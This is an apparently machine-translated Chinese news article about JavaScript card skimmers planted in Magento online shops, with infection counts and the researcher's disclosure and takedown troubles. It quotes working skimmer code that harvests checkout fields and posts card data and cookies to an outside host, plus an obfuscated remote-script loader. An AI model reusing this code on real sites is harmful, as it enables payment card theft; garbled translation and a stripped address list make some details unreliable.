在线浏览是信用卡欺诈的一种相对较新的形式。从名称中可以看出本质。如果常规撇渣器是ATM读卡器上的磁条覆盖物,则在线撇渣器是在线商店服务器上的软件书签,当用户在浏览器的文本字段中输入付款数据时,该书签会被动地拦截付款数据。迄今为止,梳理者主要集中在使用加密的交易服务器上,但是在这种情况下,即使在加密之前,信息也会被删除。然后,在秘密论坛上出售有关支付卡的信息:通常,局外人可以使用这些卡进行支付。Nightly Secure的安全专家说最近,在线浏览迅速流行。2015年首次讨论了此类欺诈的传播。截至2015年11月,在255,000个在线商店的列表中,发现3,501个在服务器上带有JS书签的商店。一年中,他们的人数增加了69%。用于拦截付款数据的示例JavaScript书签如下所示(在这种情况下,信息发送到http://ownsafety.org/opp.php):<script>
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
去年,研究人员整理了一份用于数据收集的常用地址列表:1860 https:
390 http:
309 https:
100 https:
70 https:
28 https:
23 https:
22 https:
20 https:
17 https:
10 https:
9 http:
5 https:
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https:
1 https:
1 https:
1 http:
1 http:
在几乎所有情况下,都使用相同代码的小版本。在服务器上很难检测到此书签。该代码是从CMS下载的,并且可以在浏览器中使用。去年,她在上述三个半千个网站上工作了几个月,甚至六个月甚至更长。专家认为,大量受感染的服务器表明攻击的高度自动化。不是某些脚本小子正在这样做,而是优秀的专业人员。可能来自俄罗斯。为了实现书签,使用了在线商店软件中的漏洞。首先,它是一个易受攻击的Magento Commerce软件。通过它,最容易实现CMS代码,尽管实际上,该代码可以在不必使用Magento的任何在线商店中使用。在MageReports.com网站上检查在线商店中的漏洞。尽管问题是在一年前提出的,但是在过去的一年中它并没有消失。更糟糕的是,受感染的在线商店的数量增加了一半以上。 2016年3月,带撇油器的商店数量从3501家增加到4476家,2016年9月增加到5925家。Nightly Secure的人员发布了所有受感染商店的列表,以警告客户-并将这些漏洞通知这些商店的管理员。实际上,其中包括许多颇受欢迎的网站,包括汽车制造商部门(Audi ZA),政府组织(NRSC,马来西亚),流行音乐家的网站(Björk)和非营利组织(科学博物馆,华盛顿大教堂)。如果一年前在几乎所有商店中都使用了同一在线撇渣器的小型修改,现在研究人员已经发现9个脚本变体属于3个不同的家族(Github上的示例代码)。攻击者变得更加聪明,现在使用多级代码混淆技术,这种方法很难解析。例如,可以如下屏蔽脚本:
真正的恶意软件代码:<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');
作者还改进了拦截支付卡数据的机制。如果早期恶意软件只是拦截checkoutURL中带有字符串的页面,则现在它已经可以识别流行的付款插件Firecheckout,Onestepcheckout和Paypal。Nightly Secure的专家试图与多家商店(约30家)联系,并告知他们有关已安装的撇渣器的信息,但是他们没有收到大多数商店的回应,而其他商店则表现出令人惊讶的冷漠。有人说这不是他的问题,因为付款是由第三方公司处理的。第二个人说这只是一个Javascript错误,并不是威胁。第三个人说不会有危险,因为“该存储在HTTPS上运行”。作者将撇渣器商店列表提交给Google,以将Chrome安全浏览列入黑名单。最初在Github上发布了所有分离器商店的列表。在这里,乐趣开始了。很快github没有警告从他的网站上删除了在线商店的研究结果的发表。显然,Github在收到其中一家商店的DMCA请求后,按照标准程序进行了审查。当然,当商店发现漏洞并告知全世界时,这是不愉快的。昨天,作者将在线商店安全性研究的结果转移到了Gitlab Hosting上。今天,此地址的页面返回错误404。几个小时前,作者从Gitlab 收到一封电子邮件,说明了删除的原因。奥巴马政府认为,发布易受伤害的商店清单被视为无法解决的“严重案例”。因此,该列表已被删除(UPD:访问权限已恢复,Gitlab总监道歉)。Web存档中列表的副本复制到Pastebin注意,安装了在线撇取器的商店列表列出了.RU区域中的44个域。希望这些商店的管理员将立即安装具有最新补丁的Magento版本,并为将支付卡副本泄露给黑市的客户进行赔偿。